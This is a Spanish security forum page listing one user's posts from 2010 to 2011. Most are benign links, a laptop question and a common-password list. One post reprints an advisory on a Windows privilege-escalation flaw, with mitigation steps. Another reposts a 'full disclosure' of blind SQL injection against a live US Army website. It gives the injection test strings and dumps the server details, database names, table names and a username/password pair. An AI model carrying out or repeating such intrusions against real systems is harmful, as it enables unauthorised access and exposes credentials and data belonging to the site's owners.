elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1] 2 3
1  Seguridad Informática / Hacking Wireless / [ VIDEOs ] Seguridad en redes inalámbricas en: 9 Mayo 2011, 10:52 am
Os dejo la lista de vídeos de este interesante curso sobre seguridad en redes inalámbricas:

http://www.securitytube.net/groups?operation=view&groupId=9
2  Seguridad Informática / Wireless en Linux / Aplicación linux signal strength gráficamente en: 1 Marzo 2011, 23:03 pm
Alguna recomendación de app que muestre gráficamente la intensidad de las señales capturadas? algo como esta app de Android (a poder ser más bonito :p) : http://espalandroid.net/NET/Apps/wifi-manager-redes-radar-escaner-android2.png

Thanks!
3  Seguridad Informática / Hacking / Happy Ninjas en: 27 Diciembre 2010, 12:46 pm
http://www.exploit-db.com/papers/15823/

wow!
4  Seguridad Informática / Hacking / 0 day: Elevación de privilegios en Microsoft Windows en: 25 Noviembre 2010, 16:44 pm
 0 day: Elevación de privilegios en Microsoft Windows
 ----------------------------------------------------

Se ha públicado un nuevo 0 day en Microsoft Windows que permite a un
usuario local obtener privilegios de SYSTEM (control total sobre el
sistema) eludiendo cualquier control de usuario.

Los detalles técnicos se han hecho públicos, así como el código fuente y
el programa necesarios para aprovechar el fallo. El exploit se aprovecha
de la forma en la que el controlador win32k.sys procesa ciertos valores
del registro. En concreto, el exploit manipula el valor
SystemDefaultUEDCFont del registro y activa el soporte para EUDC
(End-User-Defined-Characters) a través de la función EnableEUDC.

Esto quiere decir que el atacante debe crear una clave en el registro
donde un usuario no administrador tiene privilegios para hacerlo. Luego
intenta leerla, provoca el fallo en el driver y obtiene los privilegios.
La prueba de concepto utiliza esta clave:

HKEY_USERS\[SID DEL USUARIO]\EUDC

La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008
totalmente parcheados. Tanto si el usuario pertenece al grupo de
usuarios como al de administradores (incluso con la protección UAC
activa), se obtendrán privilegios sin ningún tipo de advertencia por
parte de Windows y por supuesto, sin necesidad de conocer la contraseña.

En Windows XP, la prueba de concepto no funciona (no existe por defecto
esa rama del registro) pero es posible que la vulnerabilidad también le
afecte. La prueba de concepto no es detectada por ningún motor en estos
momentos:

http://www.virustotal.com/file-scan/report.html?id=59260532fe33547420613b0aa7b001aed3f565201e50f91558a16cf7465775f6-1290672402

Para que este fallo fuese aprovechado por un atacante o malware, primero
debería acceder al sistema por cualquier otro medio y encontrarse con
que no puede realizar los cambios que desea a causa de los permisos.
Realmente, este no suele ser un impedimento para el malware masivo
(puesto que el usuario medio suele o bien obviar el UAC o bien
deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí
que es posible que este fallo sea usado en ataques dirigidos o entornos
profesionales, donde los usuarios de escritorio suelen tener privilegios
limitados en el dominio.

Con este fallo, ya son dos problemas de elevación de privilegios que
Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo
del famoso troyano Stuxnet. A través del programador de tareas, el
malware era capaz de elevar privilegios en el equipo infectado. Hace
algunos días los detalles de esta vulnerabilidad también se hicieron
públicos.

El equipo de seguridad de Microsoft ha declarado en su twitter que está
investigando el asunto. Un método para prevenir el problema hasta que
exista parche oficial es limitar los permisos del usuario en la rama

HKEY_USERS\[SID DEL USUARIO]\EUDC

En el registro, se debe negar el permiso de escritura a los usuarios no
administradores. Gráficamente, es sencillo (localizar el SID del
usuario, botón derecho sobre la rama del registro y denegar).

Para automatizar el proceso, aconsejamos (aunque puede tener efectos
secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una
herramienta oficial de Microsoft descargable desde:

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b

Una vez instalada, localizar el SID del usuario (normalmente terminará
en 1000) y el nombre de máquina y usuario con el comando:

whoami /user:

 INFORMACIÓN DE USUARIO
 ----------------------

Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000

y ejecutar:

subinacl.exe /subkeyreg "HKEY_USERS\
S-1-5-21-123456789-12345677889-123445678990-1000\EUDC /deny=
ordenador\usuario=w

Esto evitará que el usuario pueda escribir en esa rama y por tanto la
prueba de concepto no funcionará. Repetir para el resto de usuarios en
el equipo si los hubiera.

Fuente:http://www.hispasec.com/unaaldia/4415
5  Informática / Hardware / Sugerencia Portátil en: 16 Abril 2010, 11:48 am
Buenas!

Pues a ver, ya llevo casi 5 años con mi viejo portátil y va siendo hora de renovar! He estado mirando bastantes portátiles (Dell, Sony, ...) y al final no he llegado a nada en claro!  :P

He de decir que el tema del Hw no es mi fuerte, así que me pongo en vuestras manos, os pongo los requisitos y a ver que me podéis recomendar:

- Precio a gastarme: máximo rondando los 700 €
- Uso profesional (Ingeniero Informático)
- Sistema Operativo: Linux, en lo que me llegue si trae Win lo borraré, he mirado Ahtec sin OS, pero no me terminan de convencer
- Tema de gráficas y tal es lo de menos, no juego ni nada.
- Pantalla: de 15'4 o 15'6
- Una buena Ram (4 Gb) y un buen procesador
- HD (estado sólido?-> se sube mucho de precio): mínimo 320 Gb
- Wifi

Chorraditas que si vienen pues bien, y si no pos nada
- Cámara
- Bluetooth
- Huella dactilar

Bueno, pues a ver que me contáis!

un saludo
6  Foros Generales / Sugerencias y dudas sobre el Foro / BLOG OFICIAL elhacker.net en: 2 Marzo 2010, 14:09 pm
Acaba de abrirse al público el blog oficial de esta comunidad: http://blog.elhacker.net

Esperamos que sea un pasito más para hacer de esta comunidad un referente a nivel mundial.

Cada autor que lo considere necesario habilitará un post en el subforo adecuado para debatir sobre las entradas que se vayan publicando.

Un saludo y bienvenidos a este nuevo proyecto!
7  Comunicaciones / Hacking Mobile / Gospel y su vulnerabilidad en Windows Mobile en: 23 Febrero 2010, 13:07 pm
Bueno, pues llegó a mis manos hace un par de días la revista Hakin9 de este mes (versión americana), y hoy leyendo uno de los artículos sobre técnicas hacking de mobile phones aparece citado Gospel y el bug que encontró.

 ;-) ;-)
8  Seguridad Informática / Hacking / Las 10 contraseñas más comunes en: 26 Enero 2010, 12:11 pm
La firma de seguridad Imperva ha analizado las 32 millones de contraseñas que fueron robadas a finales del 2009 en un ataque al sitio RockYou. Los resultados son sumamente alarmantes, y deja en evidencia que la mayoría de los usuarios no tienen la más mínima responsabilidad a la hora de elegir una contraseña.

De las más de 30 millones de contraseñas que se analizaron, el 60% de ellas se basaban únicamente en números, el 30% tenía tan sólo seis caracteres o incluso menos, y la mitad eran palabras habituales del diccionario y nombre propios.

Imperva creó una lista con las contraseñas más comunes, y por desgracia, la preferida por los usuarios es “123456″. Lo peor es que la segunda más utilizada no es mucho mejor: “12345″. De hecho, toda la lista está conformada por claves que no ofrecen nada de seguridad y que pueden ser robadas muy fácilmente:

   1. 123456
   2. 12345
   3. 123456789
   4. password
   5. iloveyou
   6. princess
   7. rockyou
   8. 1234567
   9. 12345678
  10. abc123


9  Seguridad Informática / Nivel Web / Demo de XSS+BeeF en: 14 Enero 2010, 16:20 pm
muy buen video explicando algunas de las posibilidades de esta maravillosa aplicación

http://www.youtube.com/watch?v=Q9pQ3NlJtFE
10  Seguridad Informática / Nivel Web / Blind SQL injection en una Web de las fuerzas des-armadas de USA en: 14 Enero 2010, 12:38 pm
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:
Citar
Código:
[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130
All databases:
Citar
Código:
[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES
We can access information_schema, so let’s see the tables from principal database “AHOS

Citar
Código:
[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items
Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :
Citar
Código:
#Username: Dynatouch
#Password: AHOS
wtf! :|
That it’s all! Bye, TinKode…



dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines